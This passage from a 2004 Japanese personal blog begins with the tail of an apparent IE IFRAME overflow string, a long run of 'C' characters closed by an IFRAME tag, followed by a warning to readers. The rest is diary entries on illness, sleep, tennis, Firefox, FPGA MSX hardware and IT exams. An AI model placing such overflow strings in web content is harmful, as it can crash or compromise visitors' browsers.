CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC????"></IFRAME>
</HTML>
ヤバイね、これは。

油断してる人は、簡単にやられるよ~。
要注意。>ALL

そうそう、ダウンロードしたファイルは、バイナリエディタでも覗いてみるべし。
そうしないと真の意味が分からんと思われ。
サイト内関連記事:
SP2を入れろ!という罠か?罠なのか!?

関連情報:
IE6にIFRAMEタグ関連の脆弱性が見つかる(/.J)(2004.11.10追加)

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

9時間

辞めた某社から仕事をもらって在宅勤務してる夢を見た。
元上司と電話で話してた。
なぜか家の近くをSLが走ってた。(笑)
(その上司、鉄ちゃんだったから。(^^;)
で、私は、ちゃんとUC発症後の設定だった・・・。_| ̄|○

もしかして、これは、出戻りしろ!って暗示?(´・ω・`)
確かに出戻りが多い会社ではあったけど・・・。

とにかく、早く仕事しなきゃなぁ~というのはあるけど・・・。
目についたところに応募してみようかなぁ・・・。

IT業界で、身体に優しい会社なんてなかなか見つけられるものじゃないからねぇ・・・。
そんな会社を探すのはそろそろ諦める時期なのかも・・・。(つД`)

再就職→倒れるまで働く→倒れたら辞める→身体を治す→再就職→・・・

のエンドレスモードを
一生続けていくしかないかねぇ・・・。(´・ω・`)ショボーン

そんな事を続けてたらIT業界のブラックリストに載りそうな悪寒・・・。(;´Д`)

あの狂った生活に身を投じる勇気をクレ!(^^;>誰か

| | コメント (0) | トラックバック (0)

2004年11月 8日 (月曜日)

人を不良品と言うのはねぇ・・・。

福井県副知事:
「不良品」発言 「不快な思いさせた」--山本副知事が陳謝
(www.mainichi-msn.co.jp)

 会見で、山本副知事は「長く経済界にいたので、課題をいかに少なくしていくかという時の企業活動が念頭にあった。私の不徳の致すところ」などと述べた。

う~ん、経済界出身の人だったのか、この人・・・。

経済界にこういう人が多いから、 私のような難病持ちの人のように弱い人が生き難い社会になる訳ですな。( ´ー`)フゥー...

今は、同一規格&大量生産の時代ではないのですから、 不良品ではなく、規格外とか特殊品という見方 は出来なかったんですかねぇ~。

規格外とか特殊品なら、使い方次第で価値を見出せるけど、 不良品扱いだと、その人は救われない・・・。(´・ω・`)ショボーン

簡単に不良品というレッテルを貼って救わないという選択をするような事だけはして欲しくないですね。

| | コメント (0) | トラックバック (0)

SP2を入れろ!という罠か?罠なのか!?


WinXP SP2では問題無いらしいです。
うちはまだSP1だぼ・・・。(´・ω・`)ショボーン
XP SP2を普及させる為のMSの罠か?(^^;

取り合えず、近日中にWinXP SP2をインストールしてみる予定です。

実験台となるうちのVAIO U3関連の情報は、
Windows XP Service Pack 2 導入にあたってのご注意(vcl.vaio.sony.co.jp)
でチェック。(はぁ~、メンドイ・・・。(;´Д`))

| | コメント (0) | トラックバック (0)

本日のお買い物

ブラックジャックによろしく 10 精神科編(モーニングKC)
佐藤秀峰著

出版社 講談社
発売日 2004.10.22
価格  ¥ 560(¥ 533)
ISBN  4063289893

bk1で詳しく見る オンライン書店bk1

| | コメント (0) | トラックバック (0)

体力作り日記

散歩 75分
(パワーアンクル 片足0.5Kg×2)

古本屋巡りコース

| | コメント (0) | トラックバック (0)

楽天一場決定らしい。


就職内定おめでとう。
良かった~ねぇ~。

この就職難の時代に羨ましいねぇ~。
あれだけの事をしても才能さえあれば市場価値は下がらないという事ですね。

ある意味、敗者復活が可能な社会になってきたって事か?
(ベンチャー企業の楽天だったからこそってのもあるかも。
昨日のGET SPORTSマーティ・キーナートGMの話を聞いてても、 やっぱりベンチャーだなぁと思ったし。)

昔の日本なら、才能とか関係無しに、社会的に抹殺される可能性があった事件だろうからねぇ。
(逆に実績があれば、結構救われるというのが日本の風土だったりしますが・・・・。(^^;)
何だかんだ言って、結局、海外の球団かなぁと思っていたのですが、 本人の希望通り日本の球団に入団出来る事になって良かったなと。
(優秀な選手が海外へ流れてばかりいくのは、ちと悲しいものがあるからね。
日本の球界はそんなダメか?(つД`)みたいな・・・。(^^;)

まぁ、でも、楽天はベンチャーなので、使えないと分かった時の手の平の返し方は半端じゃないと思うけどね。(^^;
必死に頑張って必要な戦力になって欲しいです。

| | コメント (0) | トラックバック (1)

Firefoxでの表示崩れですが

ココログにディフォルトで用意されてるスタイルシートをそのまま使ってます。>うち
ですんで、@niftyのせいです。(爆)
(人のせいにするなよ~。(^^;>俺)

それから、 文字サイズを大きくすると、URL とか改行されない部分は完全に右ブロックに隠れてしまう現象は、 IEを使ってても起きますね。(つД`)
(前から気づいてはいたのですが、見なかった事にしてました。(^^;
一応、<pre>タグを使う時とかは、はみ出ないように注意はしてますけど。)

一画面に情報量を詰め込み過ぎな感じになる仕様なんだよなぁ~。>ココログ
この仕様は、ココログを使い始めた当初から気になってます。

まぁ、でも趣味サイトなので、そんなに細かい事は気にしないで良いかぁ~(爆)
と放置のままです。(^^;

自分で下手に色々と手を加え過ぎると保守性が落ちるしね。
ディフォルトで提供されてる物をなるべく使用って方向でやってます。

本文の表示が読み難い時は、ココモブで見てみて下さい
ココモブだと、単純なスッキリした表示になるので、そちらの方が読みやすい事もあります。
ただ、ココモブもUTF-8の罠の 対策をしてないようなので、文字化けする事がありますね。(´・ω・`)ショボーン
(記事をMacで書いてれば、このUTF-8の罠にははまらないハズなんだけど・・・。
うちのMacは壊れちゃったからなぁ~。(つД`))

しかし、新しい技術に合わせて、対応していかないといけないWeb系の技術者は大変ですなぁ~。
これだけ、色々な問題があると、 どんな条件でも問題なく表示されるサイトを作るのは至難の技ですよ・・・。

サイト内関連記事:
Mozilla Firefoxをインストールしてみた。

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

12時間

| | コメント (0) | トラックバック (0)

2004年11月 7日 (日曜日)

トイレ掃除をしてみた。

変な夢を見ないように、 こんな時間にトイレ掃除なんぞしてみました。(^^;

UCになってから、1~2年は、夢の中では健常者だったんだけど、 今では、夢の中でもUCな人のままで、常にトイレの事を考えてるという・・・。(´・ω・`)ショボーン

今日は安眠出来ると良いなぁ~。

| | コメント (0) | トラックバック (0)

体力作り日記

Jog 35分
散歩 10分

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]お昼寝

1時間30分

おなかがゴロゴログルグル鳴ってます。
ひと眠りしたら、腸の動きが非常によろしい。(^_^)
副交感神経の作用は偉大なり。

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

7時間

トイレを汚して、ウワァァ━━━━━。゚(゚´Д`゚)゚。━━━━━ン!!!!
な夢とかばかり見るの今日この頃。(^^;

| | コメント (0) | トラックバック (0)

2004年11月 6日 (土曜日)

忍者TOOLSのカウンターが飛んだ・・・。
_| ̄|○_| ̄|○_| ̄|○

http://www.shinobi.jp/maintenans.html#info02
2004/11/06
20時頃にACカウンターサービスのサーバにおいてメモリの一部をディスクに保存できない障害が発生したためカウンターの数字が0にリセットされてしまいました。この障害によりサーバ上にはトータルのアクセス数は保存できておりません。ご迷惑をおかけしまして申し訳ございません。週間の推移は修正できませんが、トータルの数字は再設定可能ですのでお手数ですがご自分で覚えておられる限りの数値で管理人室よりカウンターの数字の再セットをお願い致します。再セット方法についてはこちらをご覧下さい。

飛ぶ前のカウンター数がいくつだったかなんて覚えておらん!
つー事で、カウンターは本日より0からカウント再スタート。

| | コメント (0) | トラックバック (0)

Mozilla Firefoxをインストールしてみた。

うちのアクセスログを見てると、 Firefoxを使ってる人が増えてきたみたいなので、 どんなものか?とインストール。

イイ感じです♪
IEだとなんだかもっさりな感じのココログの編集ページでサクサク動くのが気に入った!
(ココログ編集画面で、別ウィンドウが開くような操作をすると、妙に遅い時があるけど、なぜ?>IE)

タブブラウザの機能も良いですな。
最近、はてなのアンテナを使ってるんだけど、アンテナを使う時は、タブブラウズだと楽ですね。(^_^)

とても良いブラウザなのですが、このページをFirefoxで見ると、表示が崩れるのね。(´・ω・`)ショボーン
ちゃんと表示させるには、スタイルシートを修正しないといけないような悪寒。(つД`)

スタイルシートは、勉強不足で苦手なので、修正メンドクサイ・・・。
本文を読むのには問題無さげなので、このまま放置かも。(;´Д`)

関連情報:
IEのシェア低下止まらず――10月の米ブラウザ市場(www.itmedia.co.jp)

| | コメント (0) | トラックバック (1)

体力作り日記

Jog 20分
散歩 10分

家の近所のアパートに救急車が止まってた。
何があったのだろう?

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

10時間30分

| | コメント (0) | トラックバック (0)

2004年11月 5日 (金曜日)

体力作り日記

Jog 14分
テニススクール 85分

フォアのテイクバック時の面の向きに注意。
(面は下向きに)

ヤベ、肩が痛っ!
ちょっと力んで打ち過ぎた・・・。(^^;
まだ身体が出来てない事を自覚するように!>俺

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]お昼寝

1時間30分

実際に眠ったのは、40分程度か?
横になって目を瞑ってるだけでも随分と違う。

| | コメント (0) | トラックバック (0)

はてなにも日記スペースを確保してみた。

はてなダイアリーの人様の日記にコメントを付ける事が結構あるので、 その際に、どこの誰だか分かるように日記スペースを取ってみました

これで、
オマエは何者だ?
( ゚Д゚)ゴルァ!!
ってのが無くなって良いかな?

それにしても、はてなのシステムって、慣れないと良く分からないね・・・。(´・ω・`)
せっかくなので、これからぼちぼちと慣れていって、はてなの癖も知っておこうと思います。

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

6時間

| | コメント (0) | トラックバック (0)

2004年11月 4日 (木曜日)

エンベのお勉強メモ&IT業界の売れる資格

2004年度版「いる資格、いらない資格」――営業はITコーディネータ、技術者はPMPが人気
(IT Pro)

ほぉ~、一応、営業効果があるんですなぁ~。>IT資格

取っても(自己啓発以外の)役に立たないと思ってましたが、 一応、役に立つんですねぇ~。(^^;

でも、エンベデッドシステムは、 関係なさそうですなぁ~。
やっぱり、趣味資格っぽい。(笑)>エンベ試験

で、今日もLicenseWorldでお勉強~。

【問題 4】 D/A変換器とコンパレータで構成され、コンパレータの出力に応じてD/A変換器の出力をアナログ入力値に追従させるように変化させてディジタル値を求めるA/D変換方式はどれか。
ア.逐次比較型
イ.デルタシグマ型
ウ.二重積分型
エ.フラッシュ型

あなたの答え:ア
正解:ア

【問題 8】 ソフトウェア製品を輸出する場合、外国為替管理法による規制を考慮する必要があるものはどれか。
ア.暗号化技術に関連するソフトウェア
イ.会計処理専用ソフトウェア
ウ.販売店の店頭で購入可能なソフトウェア
エ.輸出地域の商取引法を考慮せずに作成されたソフトウェア

あなたの答え:ア
正解:ア

| | コメント (0) | トラックバック (0)

体力作り日記

Jog 35分
散歩 15分

| | コメント (0) | トラックバック (0)

少し肩が痛い

まだ全力で打ち続けられる身体ではないらしい。(´・ω・`)ショボーン

しかし、身体はあちこち痛いですが、テニスをした翌日は、気分が良いんですよね。(^_^)

体力を付けない事には、再就職は難しいというのは分かってる事ですから、 テニスをメインにした体力作りに切り替えるのも良いかな?と思ってみたり。
(私の場合、ジョギングよりテニスの方が、効率的に体力が付きそうな感じする。)

兎に角、PGをしたいなら、これでもかっ!ってぐらい体力を付けないとなぁ。
他の事のプライオリティを下げてでも体力作りにリソースを集中させた方が良いのかな??

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

10時間30分

| | コメント (0) | トラックバック (0)

2004年11月 3日 (水曜日)

ホリエモンの淡々とした生き方を見習いたいですねぇ~

仙台の新球団のオーナーは楽天に決まったわけですが、 選ばれなかったライブドアの 堀江社長のコメントが良いですね。

相手を悪く言わないし、選ばれなくて悔しくなかったか?みたいな質問をされても
私は淡々と生きてる人ですから
みたいな答え方をして、悔しさ無しな雰囲気だったりする。

良いね~。
スバラシイ!

この淡々とってのは、凄く難しいんですけどねぇ。
それを実践してるとしたら、スゴイ人ですよ。
昨日からのTVのコメントを聞いて、堀江社長に凄く興味を持ったです。

もしかすると演技かもしれないですけどね。
そこは、本人しか分からないからなぁ~。(;´Д`)

でも、淡々と生きるという生き方を実践してるみたいなのは、気に入ったですよ。
というか、真似したい!
(以前から、淡々と生きるとは言ってるのですが、なかなか実現出来ない・・・。_| ̄|○>私
淡々と生きられないから病気になるし、 なかなか体調が良くならないし・・・。(´・ω・`))

テレビで何度もこのようなコメントが流れるのを見て、 淡々と生きる事を目指してる私としては、 これは参考にしなければ!と思いましたですよ。

そこで、本日より、 RSSリーダー堀江社長のblogを登録して、 しばらく観察してみる事にしました。

ついでに、トラックバックをしてみたり。(^^;

持病持ちの私としては、 健康情報には興味あるんで、 健康コンテンツの充実は激しく希望!

という感じに、ちょっと要望も書いておいてみたりもする。(^^;;;;;;;;;;;;

| | コメント (0) | トラックバック (0)

MPU(CPU)別の調査もして欲しいなぁ~と思ったり

最もセキュアなOSはBSDとMac OS X――mi2g調査(itmedia.co.jp)

この結果って、OSの普及率の割合が、そのまま調査結果にって感じでは?(^^;
(一般的に、ネットワーク分野でのLinuxの普及度はかなりのものでしょうからね。
で、政府系では、オープンソースが嫌われて、Windowsを導入してる所が多い罠。)

ちなみに、バッファオーバーフロー攻撃対策には、 システムをx86系以外の物で構築すると吉。
(一番普及してるx86系の攻撃コードは、あちこちで作られて公開されるので、 スキルの無い人でも結構簡単に攻撃出来ちゃったりするのでキケン。(爆))

LinuxとBSDに関しては、MPU(CPU)別の集計結果も見てみたいなり。
Linuxでヤラレた人のほとんどは、x86系の人だったんじゃないかなぁと。
この辺のデータまで分かると、色々と参考になりますね。

ところで、この調査ですが、Solarisの事をすっかり忘れちゃいませんかね?(^^;;;

| | コメント (0) | トラックバック (0)

FPGAを使った1チップMSXに関してコメントを頂きました。(^_^)

昨日、「製品化された1チップMSXをごにょごにょして、 X68Kを実装できないかな?とか思ってしまう」とかつぶやいてみたら、 gigamix online.comnf_banさんから、次のようなコメントを頂きました。
この1チップMSXは裏を返せば「デフォルト起動がMSX1なだけのFPGA評価ボード」ですが、残念ながらMSX2+は入らないだろうと言われています。価格と性能のバランスから言えば、今のところはMSX2相当がお手頃感が出るようです。シャープ系ならSuperMZは微妙、MZ-2200なら入りそうです。
こんな詳しい方から解説のコメントを頂けるなんて、超感謝です。m(_ _)m
具体的な説明で、1チップMSXのハードで出来る事のレベルが良く分かりました。
ご説明、ありがとうございました。

うみゅみゅ~~、
現在のお手頃価格なFPGAの規模では、
さすがにX68Kは厳しかったですか~~~。(´・ω・`)ショボーン

nf_banさんのコメントにも書かれてますが、FPGAの今後の進歩に期待して、 お手頃価格のFPGAでX68Kが実装出来る時代が来るのを待ちたいと思います。

まずは、1チップMSXを手に入れて、それでFPGAのお勉強ですね。>私
やる事、いっぱいあるなぁ~。(^^;;;;;;;;;

ところで、nf_banさんは、Mマガのプログラムコンテストの応募締切りに間に合ったようですね。
プログラム作成、お疲れ様でした。

ダメダメな私は、締切りの前日にサジを投げました。(^^;;;;;;;
それに比べて、締切りの1分前まで諦めずに格闘するなんて、ホントに凄いですね~。>nf_banさん

ホント、世の中、スゴイ人が沢山おるもんや。
インターネットしてると、スゴイ人ばかり目にするので、困っちゃいますですよ。(^^;

トラックバック先:

| | コメント (0) | トラックバック (0)

体力作り日記

テニス壁打ち 80分

今日のテーマ:
骨の動きを意識して打つ。
特に背骨の位置と動きに注意する。

右手の親指に豆が出来て潰れました。(つД`)
週に1回のテニススクール程度では、打ち込みの絶対量が足りなかった模様。

ま、テニススクールじゃ、全力で連打を続けるような事はしないしね。
たまに壁相手に全力で打つと気持ちが(・∀・)イイ!!です。

でも、何か最近、またテニスが流行ってるみたいで、壁打ちの場所が凄く混んでるんだよねぇ・・・。(´・ω・`)

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

8時間

昨晩の夜中のトイレイベントはちょっと疲れたなぁと・・・。(ノД`)

夕飯食べて横になったら、そのまま朝までグッスリというのをしてみたいと思う今日この頃。
トイレ通いしてると、一番眠いタイミングを逃すんだよねぇ・・・。

大腸無いと色々と不便ですなぁ・・・
と愚痴りたくなる・・・。(´・ω・`)ショボーン

| | コメント (0) | トラックバック (0)

2004年11月 2日 (火曜日)

[Office氏裁判]検察側は、同様のファイルにはFTP経由でアクセスするのが普通だと主張した。

ACCS裁判を追う
元研究員「HTMLソースの改変は通常の閲覧の範囲」

 検察側は、同様のファイルにはFTP経由でアクセスするのが普通だと主張した。サーバを管理していたファーストサーバやACCSもFTPからアクセスしており、HTMLからのアクセスは通常利用の範囲外。元研究員もそれを認識していたのではないかとの趣旨の質問を繰り返した。

ユーザーが想定外の操作をするのは、ごく普通な事で、想定外の操作をされて問題が発生した場合、 普通は作った(構築した)側に問題があるとされるハズなのですが・・・。
(てか・・・、
なぜにFTP経由でアクセスするのが普通とか言えちゃうんだろうか・・・。
SCPやWebDAVを知らないとか・・・。_| ̄|○)

プログラムを組む場合は、ユーザーがムチャクチャな操作をする事まで出来る限り予想して、 エラー処理を組み込んでいくわけですが、そのCGIはそれが甘かったわけで・・・。

この裁判で、ユーザーは、作った側の想定外の事をしてはいけないという事になったら、 作る方としては、大変楽になるので嬉しいですがね。( ̄ー ̄)ニヤリ

裁判の結果がサイバーノーガード戦法を推奨するような結果になったら、 日本はサイバーテロの餌食ですな。ヽ(´ー`)ノ

関連記事:
佐々木俊尚の「ITジャーナル」
2004-10-26 検察官を翻弄しまくったoffice氏の奮闘

| | コメント (0) | トラックバック (0)

[要録画]今からアラン・ケイ先生がTV生出演らしいです。(NHK教育テレビ 11月2日(火) 午後 6:20~7:55)

■ [TB][人][ヲチ]:緊急タレコミ アラン・ケイ博士 TV 出演!!
(。・x・)ゝ隊長!
録画準備終了しました!

情報ありがとうございました。m(_ _)m

| | コメント (0) | トラックバック (0)

元ネタの記事は、こちらです。>STUDIO KAMADAさん経由の方

うちのサイトがSTUDIO KAMADAさんの日記で紹介されてたようで、リファラーを見ると、その記事経由で来てる方が結構いらっしゃるようですね。

せっかく来て頂いても、元ネタの記事が過去ログに流れてしまったので、発見出来ない方もいるかと思います。
それでは申し訳ないので、元ネタになった記事を再度紹介しておきます。

元ネタの記事は、ここ↓。

2004.10.28 FPGA版MSX

それから、STUDIO KAMADAさんの記事の
「誰か1チップX68000とか作らないかなー」などと思ったりもするわけですが、「公式」と「無償」の違いは大きく…。
は、そうですよねぇ~と大きく頷いてしまったり。(^^;

確かに「公式」は強いですよねぇ~。
それに、MSXには、西和彦さんという強力なリーダーが存在する点も大きいですよね。

雑誌の復活に関しては、Oh!Xが先鞭を付けて、 Mマガがその後を追ってきたって感じだと思うんですけど・・・、その後の動きで、差が出ましたね。

Mマガが復活してからのMSX陣営には、勢いがあるよね~。
頑張ってるよなぁ。>MSXユーザーさん達

X68Kの各種ソフトの(非営利目的での)無償公開まで漕ぎ着けたFSHARPの方々は立派でしたが、 強力なリーダー不在で、そこから先の流れになかなかならないという状況ですよね・・・。>X68K陣営
KAMADAさんなどのように、X68K方面でも頑張ってるユーザーさんは沢山居るのですが、 個人レベルでは限界があるでしょうからね・・・。
分散してるマンパワーをまとめられると良いとは思うのですが・・・、 引っ張っていってくれるリーダー的な存在がないと、なかなか難しいかも・・・。

Oh!Xの方は、開店休業状態だからなぁ・・・。(´・ω・`)ショボーン
Oh!Xの最新刊が出てくれたら、また活気か出るかもしれないけど・・・。
もう出ないのかなぁ・・・。

ふと思った事を追記:

自分なりの“MSX3”を自分で作ることも?」(ascii24.com)を読むと、製品化された1チップMSXをごにょごにょして、 X68Kを実装できないかな?とか思ってしまうのですが。(^^;
MSXより、X68Kの方が機能が豊富で複雑ですので、MSX実装用のFPGAのゲート数では、 X68Kを実装するのは難しいかもしれないけど・・・。
製品化された1チップMSXがどんな物になるかによるなぁ・・・。
(ハードウェア的に可能であったとしても、私にはX68Kを実装するような技術は無いですが・・・。_| ̄|○)

とにかく、1チップMSXは面白い製品ですよ。
無事に発売されたら、ぜひとも欲しいです。

| | コメント (1) | トラックバック (0)

[睡眠時間のログ]

6時間

| | コメント (0) | トラックバック (0)

2004年11月 1日 (月曜日)

この痛み何だろう?

ストマを閉じた傷の ちょい上辺りに刺すような痛みがあるのですが、これってヤバイ?

静かにしてれば、それ程痛くないので、取り敢えず様子見状態という事にしてみますけど。

| | コメント (0) | トラックバック (0)

エンベンのお勉強メモ

いつものLicenseWorldからです。

【問題 3】 5個のデータをバブルソートを使って並べ替えるとき、最悪の場合の比較回数はどれか。
ア.5
イ.9
ウ.10
エ.25

あなたの答え:ウ
正解:ウ

∑(総和)の公式をすっかり忘れてる事が判明・・・。 (ノД`)

5+4+3+2+1を真面目に普通に計算してしまった・・・。_| ̄|○

普通の人は、次のように計算するハズ。
5+2+3+4+1=(5*(5-1))/2=10

総和の公式は、「総和 - Wikipedia」を見て確認しました。

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

14時間

凄く浅い眠りでちょくちょく目覚めながら。
(6時間ぐらいで無理矢理起きようとしてみたけど、 腹にかなりの痛みが出たので無理出来ず。orz)

| | コメント (0) | トラックバック (0)

« 2004年10月 | トップページ | 2004年12月 »